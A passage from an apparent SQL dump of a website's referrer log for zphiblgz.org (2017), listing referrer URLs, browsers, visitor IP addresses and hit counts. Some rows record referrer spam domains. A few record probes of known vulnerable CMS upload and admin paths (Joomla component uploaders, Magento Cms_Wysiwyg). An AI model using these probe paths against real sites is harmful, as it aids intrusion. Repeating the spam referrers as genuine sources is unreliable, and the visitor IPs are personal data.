e','Windows','50.0.2661.102','','42.236.99.194','000',1,0),(11828,'2017-09-28','http://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',42,0),(11829,'2017-09-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','204.8.156.142','000',3,0),(11830,'2017-09-28','https://xn--80abgj3a5acid6ghs.top/','Unknown','Unknown','Unknown','','46.118.154.197','000',2,0),(11831,'2017-09-28','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','212.227.24.44','000',1,0),(11832,'2017-09-28','http://zphiblgz.org','Chrome','Windows','10.0.648.204','','74.85.210.195','000',1,0),(11833,'2017-09-28','http://zphiblgz.org','Firefox','Windows','40.1','','197.88.113.243','000',2,0),(11834,'2017-09-28','http://zphiblgz.org','Unknown','Unknown','Unknown','','54.236.1.12','000',1,0),(11835,'2017-09-28','http://zphiblgz.org','Firefox','Windows','40.1','','203.202.241.132','000',2,0),(11836,'2017-09-28','http://zphiblgz.org','Firefox','Windows','40.1','','178.191.48.150','000',2,0),(11837,'2017-09-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.70.177','000',2,0),(11838,'2017-09-28','http://www.zphiblgz.org/index.php?option=com_adsmanager&task=upload&tmpl=component','Chrome','Windows','42.0.2311.152','','209.90.225.210','000',1,0),(11839,'2017-09-28','http://zphiblgz.org','MSIE','Windows','11.0','','172.82.184.162','000',1,0),(11840,'2017-09-28','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1558.Kx0r57XlukzzUmna01cqBTnEJ7NlgXm6_aaUvYJ8Hg_xn_V9iadYaa5Ww6WT7Oaj.e8608afe0510d305ad11d86219c419292f270507&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YCYBcIrWNUha-mUlBiA3OhY&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSldhWl9MX19MamtVYXkyQUJWcC01RnpBTTUzN2R1R3h4YkU3V1hHd2VvNlZSUkZkZC0xb3FB&b64e=2&sign=d4bbe3c3e84a001265192dd12e37005e&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQULnoVAFacUfRqg6v3aM3gY8h4gi_5IzjxJi0dlenhI4eJ62tGGVVY4a8FUWhTAqctO1w3s4zCXSiRx7zk-fTPZqTh_jp5ahovd_rkIb65bYL2iQTOR4P5gvQInNqjZcqA&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXma_RTIh0ntMEdXUcEixIS1tNeWcKGOh4wmNiQFRR7kuLQ3q3mi9T6XA0MtAPQCLPN46OaSqBLyQ&l10n=ru&cts=1506595525374&mc=5.73739572829','Firefox','Windows','53.0','','176.15.43.101','000',1,0),(11841,'2017-09-28','http://zphiblgz.org','Firefox','Windows','40.1','','191.177.185.4','000',2,0),(11842,'2017-09-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.20.55.18','000',2,0),(11843,'2017-09-28','http://zphiblgz.org/','Chrome','Windows','33.0.1750.117','','155.133.82.107','000',2,0),(11844,'2017-09-28','http://zphiblgz.org','Unknown','Unknown','Unknown','','158.85.81.122','000',1,0),(11845,'2017-09-28','http://kirov.zrus.org/','MSIE','Windows','7.0','','46.118.158.19','000',3,0),(11846,'2017-09-28','http://zphiblgz.org','Firefox','Windows','40.1','','179.99.230.216','000',2,0),(11847,'2017-09-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','176.121.10.52','000',2,0),(11848,'2017-09-28','http://zphiblgz.org','Firefox','Windows','40.1','','91.69.168.124','000',2,0),(11849,'2017-09-28','http://zphiblgz.org','Firefox','Windows','40.1','','37.58.156.212','000',2,0),(11850,'2017-09-28','http://komp-pomosch.ru/','Opera','Windows','9.0','','188.163.72.15','000',1,0),(11851,'2017-09-28','http://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.114','000',2,0),(11852,'2017-09-28','http://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.54','000',1,0),(11853,'2017-09-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','188.116.11.181','000',1,0),(11854,'2017-09-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','91.121.52.156','000',1,0),(11855,'2017-09-28','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.104.120.4','000',1,0),(11856,'2017-09-28','http://zphiblgz.org','Firefox','Windows','40.1','','98.23.179.26','000',2,0),(11857,'2017-09-28','http://zphiblgz.org','MSIE','Windows','9.0','','45.32.59.36','000',1,0),(11858,'2017-09-28','http://zphiblgz.org','Firefox','Windows','40.1','','82.245.180.105','000',2,0),(11859,'2017-09-28','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','188.226.149.194','000',2,0),(11860,'2017-09-28','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1558.Gj9NN6XuA4iEJ4WRCm88hfmU4Lsz72dAoTTUCKh1OYlSnzVd3aTd1SsFXFCMK4e2.bc9eff79a4550deb048464db9c5e369184818fc4&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YCYBcIrWNUha-mUlBiA3OhY&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSldhWl9MX19MamtXQjZLMHpfYTV6TXY0dUlTdFhPVDFkdW8wb0JLWjkxTW41REhYYWNYWXZL&b64e=2&sign=f35411f99dbda7559a7b8db8e626d380&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYP93XfrtkbamnvWz4snGJXTMZdov4XZKL7Gt_vmPv1tCPuVyIOH_bfsXhPp4bTyoAIz9lojhV-w6ojxPEcDxuskpqzupR3DVN8EZMEq-5G18QGF2u2Gam0dSBQFlqEd3qbBEDOVT1Cj&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCWAB4NbWhozjnJ_BD8jcXzX_KZ9bNEJO3hEQp8vVkUg3MHbK2dp_La5DgYq34hHvxP6EPQVrbhDOA&l10n=ru&cts=1506613629918&mc=6.86820282179','Firefox','Windows','53.0','','5.164.83.179','000',1,0),(11861,'2017-09-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.206','000',1,0),(11862,'2017-09-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','37.187.129.166','000',1,0),(11863,'2017-09-28','http://zphiblgz.org/','Firefox','Windows','7.0.1','','51.15.79.107','000',1,0),(11864,'2017-09-28','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',2,0),(11865,'2017-09-28','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',2,0),(11866,'2017-09-28','http://www.zphibmaryland.org/chapters/','Chrome','Windows','61.0.3163.100','','69.195.247.116','000',2,0),(11867,'2017-09-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.56.11','000',1,0),(11868,'2017-09-28','http://zphiblgz.org/','Firefox','Windows','7.0.1','','62.210.37.82','000',1,0),(11869,'2017-09-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','145.239.82.79','000',1,0),(11870,'2017-09-28','http://zphiblgz.org/','Firefox','Windows','7.0.1','','51.15.76.81','000',2,0),(11871,'2017-09-28','http://zphiblgz.org/download/aarc/','Chrome','Windows','58.0.3029.96','','62.149.7.165','000',1,0),(11872,'2017-09-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.103.99.60','000',1,0),(11873,'2017-09-28','http://zphiblgz.org/','Firefox','Windows','7.0.1','','149.56.223.241','000',1,0),(11874,'2017-09-28','http://zphiblgz.org','Firefox','Windows','40.1','','115.132.152.109','000',2,0),(11875,'2017-09-28','http://zphiblgz.org/','Firefox','Windows','7.0.1','','84.19.181.25','000',1,0),(11876,'2017-09-28','https://lechenie-gemorroya.com/','MSIE','Windows','6.0','','188.163.72.15','000',3,0),(11877,'2017-09-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','54.36.81.57','000',2,0),(11878,'2017-09-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.218.63.76','000',2,0),(11879,'2017-09-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.224.65','000',1,0),(11880,'2017-09-28','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.12.190','000',1,0),(11881,'2017-09-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','145.239.29.201','000',2,0),(11882,'2017-09-28','http://krassh.ru/','MSIE','Windows','6.0','','178.137.177.108','000',3,0),(11883,'2017-09-28','http://www.zphibmaryland.org/chapters/','Safari','iPad','9.0','','96.255.163.84','000',4,0),(11884,'2017-09-28','http://pornolook.net/','MSIE','Windows','6.0','','46.118.159.26','000',2,0),(11885,'2017-09-28','http://zphiblgz.org','MSIE','Windows','11.0','','54.85.20.160','000',1,0),(11886,'2017-09-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.34.210','000',1,0),(11887,'2017-09-28','http://zphiblgz.org','Firefox','Windows','7.0.1','','137.74.167.96','000',1,0),(11888,'2017-09-28','http://zphiblgz.org/','Firefox','Windows','7.0.1','','163.172.223.200','000',1,0),(11889,'2017-09-29','http://zphiblgz.org','Firefox','Windows','40.1','','177.97.94.112','000',2,0),(11890,'2017-09-29','http://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',85,0),(11891,'2017-09-29','http://x-lime.net/','MSIE','Windows','6.0','','46.118.159.26','000',3,0),(11892,'2017-09-29','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.167','000',2,0),(11893,'2017-09-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','142.44.166.241','000',2,0),(11894,'2017-09-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','92.222.6.12','000',1,0),(11895,'2017-09-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','144.217.240.34','000',1,0),(11896,'2017-09-29','http://zphiblgz.org/','Firefox','Windows','7.0.1','','62.210.129.246','000',1,0),(11897,'2017-09-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','78.109.23.1','000',1,0),(11898,'2017-09-29','zphiblgz.org','Chrome','Windows','50.0.2661.75','','176.31.181.28','000',8,0),(11899,'2017-09-29','zphiblgz.org','Chrome','Windows','50.0.2661.75','','87.98.227.4','000',7,0),(11900,'2017-09-29','zphiblgz.org','Chrome','Windows','50.0.2661.75','','132.255.220.2','000',6,0),(11901,'2017-09-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.212.115','000',2,0),(11902,'2017-09-29','https://univerfiles.com/','MSIE','Windows','6.0','','46.118.158.19','000',6,0),(11903,'2017-09-29','http://life-instyle.com/eda.html','Opera','Windows','8.01','','46.118.158.19','000',3,0),(11904,'2017-09-29','http://karaganda.xkaz.org/','MSIE','Windows','5.5','','46.118.159.26','000',2,0),(11905,'2017-09-29','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','146.71.25.112','000',1,0),(11906,'2017-09-29','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','104.250.196.134','000',2,0),(11907,'2017-09-29','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.76.78.127','000',2,0),(11908,'2017-09-29','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.102.18.168','000',2,0),(11909,'2017-09-29','https://mojaocena.com/','Opera','Windows','7.0','','188.163.72.15','000',1,0),(11910,'2017-09-29','http://zphiblgz.org','Chrome','Linux','26.0.1410.63','','45.62.238.130','000',9,0),(11911,'2017-09-29','http://zphiblgz.org','Unknown','Unknown','Unknown','','45.62.238.130','000',1,0),(11912,'2017-09-29','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','104.166.88.74','000',2,0),(11913,'2017-09-29','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','64.137.1.176','000',2,0),(11914,'2017-09-29','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','64.137.2.201','000',2,0),(11915,'2017-09-29','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','146.71.23.203','000',1,0),(11916,'2017-09-29','http://www.zphibmaryland.org/chapters/','Safari','iPhone','11.0','','107.77.241.3','000',3,0),(11917,'2017-09-29','https://mojpreskumanie.com/','MSIE','Windows','6.0','','188.163.72.15','000',3,0),(11918,'2017-09-29','http://zphiblgz.org','Firefox','Windows','55.0','','198.51.197.42','000',2,0),(11919,'2017-09-29','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1559.MJgtRfALI5F3YhNeIiQaQtlSfqfF-CiqzdYxdY0uGi4pQkgkq325G1b5-jvy4mRz.f8ce9d51b8e9fc2ded892b104b69a73029962985&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YMIVJNtoWDTa6Ctl47TPu5I&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSldhWl9MX19MamtlaE0xRDVhMjU2ZVUyMVFueDFBeGNEeThfN0NJRlAzZV9UVW1wZ1ZibVRz&b64e=2&sign=834e112185d89f267a78fa6fedc12772&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYP93XfrtkbarvIRSWga0QwzsNKoYV6bZv7Q_cWJmGv-6LMa0yMJHxL7DGj9i9fJds3uLgDn8Y42Z5BtVhNSlIj5g5sbq1Zyk539_Te4nJbd6eOHqKYWUJCUmqpGim3SLCvnVucJ8KXl&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCWbgDHRNa-0ytkKd6p8b7aHX-Qnii0T-P4vV0-2ktYas0Yuyh1-f1wd-fCi5703YsTtlIJzrGMDKw&l10n=ru&cts=1506697258480&mc=3.14053417998','Firefox','Windows','53.0','','95.220.217.169','000',1,0),(11920,'2017-09-29','http://zphiblgz.org/','Safari','iPhone','11.0','','107.77.241.8','000',1,0),(11921,'2017-09-29','https://www.google.com/','Chrome','Windows','60.0.3112.113','','167.102.191.10','000',3,0),(11922,'2017-09-29','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',2,0),(11923,'2017-09-29','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',2,0),(11924,'2017-09-29','https://www.facebook.com/','Chrome','Windows','61.0.3163.100','','167.102.191.10','000',2,0),(11925,'2017-09-29','http://zphiblgz.org','Safari','iPhone','10.0','','69.143.35.179','000',2,0),(11926,'2017-09-29','http://zphiblgz.org','Firefox','Windows','40.1','','181.223.31.161','000',2,0),(11927,'2017-09-29','http://zphiblgz.org','Chrome','Windows','51.0.2704.103','','185.85.239.110','000',2,0),(11928,'2017-09-29','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','50.87.106.118','000',2,0),(11929,'2017-09-29','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.55.41','000',1,0),(11930,'2017-09-29','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1559.mMLhfn2q2fmzHM2SqOtYPbEZ4j54YBygYl90MmC8vViyjDlJWkr1aVOvrwltHbre.8ba31d11ae8fc45a438d47719b0df5b8bb06d6e7&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YMkOSpatjLUqgxH-XWLwn-g&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSldhWl9MX19MamtWUWNuSXUwVmcxeF9JUnBhQnJKN2czQkdScm92am1JLUpXNXJMUWVpaW1u&b64e=2&sign=33926fa530be460eac0dc93014f7deaa&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYuwSQLovbTTTAPh0Eu1M2avMnIJjvsiIv2FfKPoIGl8RPBdauoop5Msblwq5vhSxvdUqLhdBPgAfLoqEeuXZyBB0KxCg-KtH3vwLvRucQmpQo6u0hWsU_ALc9yFLZGCSvGzxrAaJcey&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCVwjJVQHb9Cs1lC1kZgRFvwAWNi_PnbM3sPLyPCtQoIVYN8vAiDHGHB5GSQhuZKtm--BCbdkZQw1w&l10n=ru&cts=1506725122803&mc=3.69191695872','Firefox','Windows','53.0','','90.154.83.45','000',1,0),(11931,'2017-09-29','http://zphiblgz.org','Chrome','Chrome OS','60.0.3112.112','','69.143.35.179','000',6,0),(11932,'2017-09-30','http://zphiblgz.org','Unknown','Unknown','Unknown','','196.52.43.63','000',1,0),(11933,'2017-09-30','http://stroyplus.ru/','MSIE','Windows','6.0','','188.163.72.15','000',2,0),(11934,'2017-09-30','http://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',40,0),(11935,'2017-09-30','http://zphiblgz.org','MSIE','Windows','6.0','','185.147.82.115','000',1,0),(11936,'2017-09-30','http://xdoza.com/','MSIE','Windows','6.0','','46.118.154.197','000',3,0),(11937,'2017-09-30','https://bizlist.com.de/','Opera','Windows','8.50','','46.118.154.197','000',5,0),(11938,'2017-09-30','https://liky.co.ua/','MSIE','Windows','6.0','','46.118.159.26','000',2,0),(11939,'2017-09-30','http://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.35','000',1,0),(11940,'2017-09-30','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','64.137.1.118','000',2,0),(11941,'2017-09-30','http://zphiblgz.org','Firefox','Windows','29.0','','109.238.239.238','000',2,0),(11942,'2017-09-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','87.118.116.12','000',2,0),(11943,'2017-09-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','138.197.207.243','000',2,0),(11944,'2017-09-30','http://zphiblgz.org/','Safari','iPhone','11.0','','73.201.199.79','000',1,0),(11945,'2017-09-30','http://zphiblgz.org','Unknown','Unknown','Unknown','','185.129.148.44','000',1,0),(11946,'2017-09-30','http://zphiblgz.org','Firefox','Windows','3.6','','185.129.148.44','000',2,0),(11947,'2017-09-30','http://zphiblgz.org','Android Browser','Android','4.0','','199.255.211.56','000',1,0),(11948,'2017-09-30','http://zphiblgz.org/','Safari','iPhone','11.0','','107.77.241.5','000',1,0),(11949,'2017-09-30','http://zphiblgz.org','Safari','iPhone','10.0','','174.205.3.250','000',7,0),(11950,'2017-09-30','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.167','000',2,0),(11951,'2017-09-30','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','51.254.167.252','000',1,0),(11952,'2017-09-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.20.55.16','000',2,0),(11953,'2017-09-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','78.109.23.1','000',2,0),(11954,'2017-09-30','http://zphiblgz.org','Firefox','Windows','40.1','','80.35.188.55','000',2,0),(11955,'2017-09-30','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','192.187.108.186','000',2,0),(11956,'2017-09-30','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','104.166.88.74','000',2,0),(11957,'2017-09-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.140.123','000',1,0),(11958,'2017-09-30','http://zphiblgz.org/','Firefox','Windows','7.0.1','','93.174.93.133','000',1,0),(11959,'2017-09-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','89.234.157.254','000',4,0),(11960,'2017-09-30','http://zphiblgz.org','Firefox','Windows','50.0','','201.18.18.173','000',12,0),(11961,'2017-09-30','http://www.zphibmaryland.org/chapters/','Chrome','Windows','61.0.3163.100','','96.88.220.41','000',4,0),(11962,'2017-09-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','120.29.217.46','000',1,0),(11963,'2017-09-30','http://zphiblgz.org/','Firefox','Windows','7.0.1','','137.74.73.179','000',1,0),(11964,'2017-09-30','http://irkutsk.zrus.org/','MSIE','Windows','6.0','','46.118.154.110','000',3,0),(11965,'2017-09-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','158.69.83.25','000',2,0),(11966,'2017-09-30','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',4,0),(11967,'2017-09-30','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',2,0),(11968,'2017-09-30','https://www.google.com/','Chrome','Windows','61.0.3163.100','','64.129.170.38','000',1,0),(11969,'2017-09-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','84.19.181.25','000',1,0),(11970,'2017-09-30','http://zphiblgz.org/','Firefox','Windows','7.0.1','','109.201.133.100','000',1,0),(11971,'2017-09-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','84.190.179.230','000',1,0),(11972,'2017-09-30','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.163.1.11','000',1,0),(11973,'2017-09-30','http://zphiblgz.org','Safari','Macintosh','9.1.2','','76.100.200.217','000',2,0),(11974,'2017-09-30','https://www.google.com/','Safari','iPhone','11.0','','50.86.48.115','000',1,0),(11975,'2017-09-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','172.98.193.43','000',2,0),(11976,'2017-09-30','https://kursy-ege.ru/','Opera','Windows','8.50','','188.163.74.19','000',2,0),(11977,'2017-09-30','http://zphiblgz.org/administrator/components/com_simplephotogallery/lib/uploadFile.php','Chrome','Windows','42.0.2311.152','','209.90.225.210','000',1,0),(11978,'2017-09-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.141.39.47','000',1,0),(11979,'2017-09-30','http://zphiblgz.org/','Firefox','Windows','7.0.1','','95.211.230.94','000',1,0),(11980,'2017-09-30','https://www.google.com/','Safari','iPhone','11.0','','107.77.100.57','000',1,0),(11981,'2017-09-30','http://zphiblgz.org','Firefox','Windows','40.1','','41.249.209.230','000',2,0),(11982,'2017-09-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.169','000',1,0),(11983,'2017-09-30','http://optom-deshevo.ru/','MSIE','Windows','3.02','','46.118.154.110','000',1,0),(11984,'2017-09-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.101.137','000',1,0),(11985,'2017-09-30','http://zphiblgz.org','Firefox','Windows','40.1','','80.235.70.145','000',2,0),(11986,'2017-09-30','http://zphiblgz.org','Unknown','Unknown','Unknown','','144.217.92.145','000',1,0),(11987,'2017-09-30','http://rockprogblog.com/','MSIE','Windows','5.0','','37.115.189.113','000',2,0),(11988,'2017-09-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','80.67.172.162','000',2,0),(11989,'2017-09-30','http://taraz.xkaz.org/','MSIE','Windows','6.0','','37.115.191.27','000',2,0),(11990,'2017-10-01','http://grand-chlen.ru/','MSIE','Unknown','7.0b','','37.115.191.27','000',6,0),(11991,'2017-10-01','https://bizlist.com.de/','Opera','Windows','7.11','','37.115.189.113','000',2,0),(11992,'2017-10-01','http://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',60,0),(11993,'2017-10-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','79.137.80.94','000',2,0),(11994,'2017-10-01','http://zphiblgz.org/','Chrome','Windows','57.0.2987.133','','212.26.236.171','000',3,0),(11995,'2017-10-01','http://zphiblgz.org','MSIE','Windows','10.0','','144.76.71.83','000',1,0),(11996,'2017-10-01','http://zphiblgz.org','Chrome','Windows','42.0.2311.90','','34.211.192.174','000',4,0),(11997,'2017-10-01','https://sajatvelemeny.com/','Opera','Windows','7.11','','188.163.74.19','000',1,0),(11998,'2017-10-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','64.113.32.29','000',1,0),(11999,'2017-10-01','http://zphiblgz.org/','Firefox','Windows','7.0.1','','208.67.1.83','000',1,0),(12000,'2017-10-01','http://zphiblgz.org/admin/Cms_Wysiwyg/directive/index/','Firefox','Windows','47.0','','184.75.212.6','000',1,0),(12001,'2017-10-01','http://zphiblgz.org','Firefox','Windows','40.1','','97.80.107.28','000',2,0),(12002,'2017-10-01','https://colobit.biz/?ref=kissska','Unknown','Unknown','Unknown','','46.118.154.110','000',4,0),(12003,'2017-10-01','https://xn----dtbndd4ae7eub.top/','MSIE','Windows','2.0d','','37.115.189.113','000',3,0),(12004,'2017-10-01','https://buyclomidonlaine.com/','MSIE','Windows','6.0','','37.115.189.113','000',1,0),(12005,'2017-10-01','http://zphiblgz.org','Firefox','Windows','40.1','','93.149.131.215','000',2,0),(12006,'2017-10-01','http://pk-services.ru/','MSIE','Windows','6.0','','188.163.74.19','000',1,0),(12007,'2017-10-01','http://zphiblgz.org','Firefox','Windows','40.1','','84.117.173.185','000',2,0),(12008,'2017-10-01','https://www.google.com/','Safari','iPhone','11.0','','104.183.116.164','000',5,0),(12009,'2017-10-01','https://mojpreskumanie.com/','Opera','Windows','9.0','','188.163.74.19','000',2,0),(12010,'2017-10-01','http://zphiblgz.org/','Chrome','Windows','56.0.2924.87','','178.137.160.56','000',2,0),(12011,'2017-10-01','http://zphiblgz.org','Firefox','Windows','40.1','','45.58.239.53','000',1,0),(12012,'2017-10-01','http://zphiblgz.org','Firefox','Windows','40.1','','89.237.101.240','000',2,0),(12013,'2017-10-01','http://krassh.ru/','MSIE','Windows','6.0','','178.137.177.108','000',3,0),(12014,'2017-10-01','http://zphiblgz.org','curl','Unknown','7.54.1','','176.74.217.68','000',1,0),(12015,'2017-10-01','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',3,0),(12016,'2017-10-01','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',1,0),(12017,'2017-10-01','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.44','000',1,0),(12018,'2017-10-01','http://zphiblgz.org','Firefox','Windows','40.1','','71.83.170.126','000',2,0),(12019,'2017-10-01','http://zphiblgz.org/','Safari','iPhone','11.0','','107.77.241.1','000',2,0),(12020,'2017-10-01','http://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.233.117','000',1,0),(12021,'2017-10-01','http://zphiblgz.org','Firefox','Windows','40.1','','99.199.174.108','000',1,0),(12022,'2017-10-01','http://zphiblgz.org','Firefox','Windows','28.0','','192.3.24.116','000',2,0),(12023,'2017-10-01','http://zphiblgz.org/','Chrome','Windows','58.0.3029.81','','163.172.4.153','000',1,0),(12024,'2017-10-01','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','212.227.24.44','000',2,0),(12025,'2017-10-01','http://zphiblgz.org','Firefox','Windows','51.0','','94.229.71.89','000',1,0),(12026,'2017-10-02','http://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',109,0),(12027,'2017-10-02','http://macrotek.ru/','MSIE','Windows','6.0','','188.163.74.19','000',4,0),(12028,'2017-10-02','http://zphiblgz.org','Unknown','Unknown','Unknown','','158.85.81.114','000',1,0),(12029,'2017-10-02','http://zphiblgz.org','Chrome','Windows','61.0.3163.100','','173.69.157.50','000',11,0),(12030,'2017-10-02','android-app://com.google.android.googlequicksearchbox','Chrome','Android','61.0.3163.98','','182.251.249.49','000',1,0),(12031,'2017-10-02','http://zphiblgz.org','Firefox','Windows','48.0','','35.193.28.1','000',2,0),(12032,'2017-10-02','http://zphiblgz.org','MSIE','Windows','8.0','','50.112.194.65','000',1,0),(12033,'2017-10-02','http://zphiblgz.org','python-requests','Unknown','2.14.2','','216.52.21.5','000',2,0),(12034,'2017-10-02','http://zphiblgz.org','MSIE','Windows','9.0','','144.76.80.151','000',4,0),(12035,'2017-10-02','http://zphiblgz.org','Firefox','Windows','40.1','','91.187.123.12','000',2,0),(12036,'2017-10-02','http://yoshkarola.zrus.org/','MSIE','Windows','6.0','','46.118.154.110','000',4,0),(12037,'2017-10-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.140.123','000',1,0),(12038,'2017-10-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.141.220','000',1,0),(12039,'2017-10-02','http://zphiblgz.org/','Firefox','Windows','7.0.1','','80.82.67.186','000',1,0),(12040,'2017-10-02','http://zphiblgz.org','Firefox','Windows','40.1','','82.40.108.61','000',2,0),(12041,'2017-10-02','http://zphiblgz.org','Chrome','Windows','33.0.1750.117','','144.76.80.151','000',1,0),(12042,'2017-10-02','http://zphiblgz.org','Firefox','Windows','25.0','','88.198.22.8','000',1,0),(12043,'2017-10-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','66.180.193.219','000',1,0),(12044,'2017-10-02','zphiblgz.org','Chrome','Windows','50.0.2661.75','','188.165.193.197','000',2,0),(12045,'2017-10-02','https://www.google.com/','Chrome','Windows','61.0.3163.91','','216.47.178.2','000',8,0),(12046,'2017-10-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','91.219.237.244','000',1,0),(12047,'2017-10-02','http://zphiblgz.org/','Firefox','Windows','7.0.1','','163.172.179.129','000',1,0),(12048,'2017-10-02','http://zphiblgz.org','MSIE','Windows','9.0','','213.239.205.118','000',5,0),(12049,'2017-10-02','http://zphiblgz.org','MSIE','Windows','10.0','','144.76.80.151','000',5,0),(12050,'2017-10-02','http://zphiblgz.org','Firefox','Windows','40.1','','36.72.190.199','000',2,0),(12051,'2017-10-02','zphiblgz.org','Chrome','Windows','50.0.2661.75','','82.165.140.254','000',2,0),(12052,'2017-10-02','http://zphiblgz.org','Firefox','Windows','40.1','','186.176.234.152','000',3,0),(12053,'2017-10-02','http://zphiblgz.org','Firefox','Windows','40.1','','45.117.28.179','000',2,0),(12054,'2017-10-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','149.56.223.241','000',2,0),(12055,'2017-10-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','50.116.1.172','000